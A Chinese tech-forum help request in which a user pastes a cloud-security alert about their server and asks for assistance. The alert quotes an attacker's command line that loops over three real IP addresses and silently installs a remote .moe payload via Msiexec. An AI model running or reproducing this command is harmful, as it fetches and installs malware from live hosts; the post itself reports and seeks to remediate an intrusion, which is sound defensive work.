好友
阅读权限10
听众
最后登录1970-1-1
|
sanpu
发表于 2020-8-21 07:52
本帖最后由 sanpu 于 2020-8-21 07:58 编辑
[url=]备注[/url]处理
该告警由如下引擎检测发现:
父进程路径: C:/Windows/System32/cmd.exe
父进程命令行: "C:\Windows\System32\cmd.exe" /c for /d %i in (113.230.237.7:16869 1.248.75.8:17182 218.4.111.170:16142) do Msiexec /i http://%i/785AD053.moe /Q
父进程id: 460
进程ID: 4204
URL链接: http://218.4.111.170:16142/785ad053.moe
命令行参数: Msiexec /i http://218.4.111.170:16142/785AD053.moe /Q
与该URL有关联的漏洞: None
事件说明: 云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案: 请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
求助大佬 |
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|